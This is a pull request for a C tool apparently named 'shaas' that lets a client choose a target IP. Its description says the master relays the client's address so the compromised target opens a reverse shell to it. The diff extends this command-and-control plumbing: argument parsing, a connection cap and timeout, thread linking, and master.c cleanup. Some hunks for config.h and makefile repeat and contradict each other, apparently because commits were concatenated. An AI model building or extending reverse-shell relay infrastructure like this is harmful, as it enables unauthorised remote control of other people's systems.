### PR TITLE
Handle multiple targets

### DIFF
--- a/client.c
+++ b/client.c
@@ -55,13 +55,27 @@ fail:
 }
 
 int
-main(void) {
+main(int argc, char **argv) {
   char success;
   int rc, skip, listen_fd, shell_fd, master_fd;
   socklen_t target_addr_len;
   struct sockaddr_in listen_addr, master_addr, target_addr;
   struct sigaction sig_alrm, sig_int;
   char ip_str[INET_ADDRSTRLEN];
+  struct in_addr target_ip;
+
+  if (argc < 2)
+  {
+    fputs("Please specify a target IP: ./shaas [TARGET_IP]\n", stderr);
+    return -1;
+  }
+
+  rc = inet_pton(AF_INET, argv[1], &target_ip);
+  if (rc != 1)
+  {
+    fputs("Invalid target IP\n", stderr);
+    return -1;
+  }
 
   sig_alrm.sa_flags = 0;
   sig_alrm.sa_handler = SIG_IGN;
@@ -133,7 +147,8 @@ main(void) {
     perror("connect");
     goto close_masterfd;
   }
-
+  
+  write(master_fd, &target_ip.s_addr, sizeof(in_addr_t));
   write(master_fd, &listen_addr.sin_port, sizeof(in_port_t));
   rc = read(master_fd, &success, 1);
   if (rc < 0) {

--- a/include/shaas/config.h
+++ b/include/shaas/config.h
@@ -33,4 +33,8 @@
 #define MAX_CONNS 128
 #endif
 
+#ifndef CONN_TIMEOUT
+#define CONN_TIMEOUT 30
+#endif
+
 #endif

--- a/include/shaas/config.h
+++ b/include/shaas/config.h
@@ -29,4 +29,8 @@
 #define CLIENT_PORT 4200
 #endif
 
+#ifndef MAX_CONNS
+#define MAX_CONNS 128
+#endif
+
 #endif

--- a/makefile
+++ b/makefile
@@ -29,7 +29,6 @@ defines =											\
 
 ccflags = 		\
 	-Wall 		\
-	-fsanitize=address \
 	-I./include	\
 	-g 		 	\
 	$(defines)

--- a/makefile
+++ b/makefile
@@ -29,8 +29,12 @@ defines =											\
 
 ccflags = 		\
 	-Wall 		\
+	-fsanitize=address \
 	-I./include	\
+	-g 		 	\
 	$(defines)
+ldflags = 		\
+	-lpthread
 
 .PHONY: all clean client master payload
 
@@ -46,7 +50,7 @@ master: $(MASTER_ARTIFACT)
 payload: $(TARGET_ARTIFACT)
 
 $(MASTER_ARTIFACT): master.c
-	$(MASTER_CC) $(ccflags) -o $@ $^
+	$(MASTER_CC) $(ccflags) -o $@ $^ $(ldflags)
 
 $(CLIENT_ARTIFACT): client.c
 	$(CLIENT_CC) $(ccflags) -o $@ $^

--- a/master.c
+++ b/master.c
@@ -21,12 +21,6 @@ typedef struct {
   pthread_cond_t cond;
   pthread_mutex_t mutex;
 } arg_pack_t;
-
-typedef struct
-{
-  pthread_t tid;
-  int seconds;
-} pthread_alarm_t;
 /* ****************************************** */
 
 // PROTOS

--- a/master.c
+++ b/master.c
@@ -79,15 +79,12 @@ sigint_listen_thread_handler(int signo) {
 
 static int
 send_close_magic(int target_fd, char *success) {
-  char discard;
   union client_request request;
-
-  if (success == NULL)
-    success = &discard;
-
   memcpy(request.bytes, close_magic, sizeof(close_magic));
   write(target_fd, &request, sizeof(union client_request));
-  return read(target_fd, success, 1);
+  if (success != NULL)  
+    return read(target_fd, success, 1);
+  else return 0;
 }
 
 static void


### PR DESCRIPTION
Main thread spawns a listener thread, which listens for client connections.
Main thread then accepts target connections and for each one of them spawns a target connection handler.
A target connection handler waits for the listener to provide him with a client connection, it then passes the IP of the client to the target that in turn will open a reverse shell towards the client.